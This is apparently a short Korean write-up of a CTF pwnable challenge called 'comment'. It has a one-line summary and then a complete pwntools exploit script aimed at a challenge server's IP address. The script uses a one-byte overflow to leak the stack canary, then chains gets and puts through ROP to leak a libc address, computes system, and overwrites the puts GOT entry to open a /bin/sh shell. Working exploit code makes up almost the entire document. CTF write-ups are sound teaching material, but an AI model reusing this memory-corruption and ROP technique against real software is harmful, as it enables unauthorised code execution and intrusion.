H3X0R CTF comment

후기 : 1바이트 overflow를 통한 취약점 트리거! 입력가능범위를 ret까지만 늘리고

무한정 받을수있는 gets로 ret를 넘겨 rop로 공격했다.

포너블 입문할때 풀었던 ropasaurusrex문제가 생각나는 문제였다

from pwn import *
#s = remote('localhost', 4000)
s = remote('52.199.49.117', 10005)
elf = ELF('/home/cdor1/pwnable/comment')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets_plt = elf.plt['gets']
gets_got = elf.got['gets']
bss = elf.bss()

def login(password):
	print s.recvuntil('Choose :')
	s.sendline('1')
	print s.recvuntil('Give me the password')
	s.sendline(password)

def write(comment):
	print s.recvuntil('Choose :')
	s.sendline('2')
	print s.recvuntil('Give me your comment!')
	s.sendline(comment)

def view():
	print s.recvuntil('Choose :')
	s.sendline('3')

def edit(comment):
	print s.recv(2048)
	s.sendline('4')
	print s.recv(2048)
	s.sendline(comment)

login('{0h_y0u_s01v3d_5t3p_0n3}')
write('A'*1024)
edit('A'*1025)
edit('B'*1025)
view()
print s.recvuntil('B'*1025)
canary = u32('\x00' + s.recv(3))
log.info('canary : ' + hex(canary))

for i in range(0, 8):
	edit('A'*1040)

payload = 'B'*1024
payload += p32(canary)
payload += 'A'*12
payload += p32(0x080486C9)
edit(payload)

s.sendline('5')
s.sendline('5')

payload = 'A'*50
payload += p32(canary)
payload += 'A'*12
payload += p32(gets_plt)
payload += p32(0x08048A3F)
payload += p32(bss)

payload += p32(puts_plt)
payload += p32(0x08048A3F)
payload += p32(puts_got)

payload += p32(gets_plt)
payload += p32(0x08048A3F)
payload += p32(puts_got)

payload += p32(puts_plt)
payload += 'AAAA'
payload += p32(bss)

s.sendline(payload)
s.sendline('/bin/sh\x00')

print s.recvuntil('password\n')
leak = u32(s.recv(4))
base = leak - 0x6F690
system = base + 0x45390
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))
s.sendline(p32(system))
s.interactive()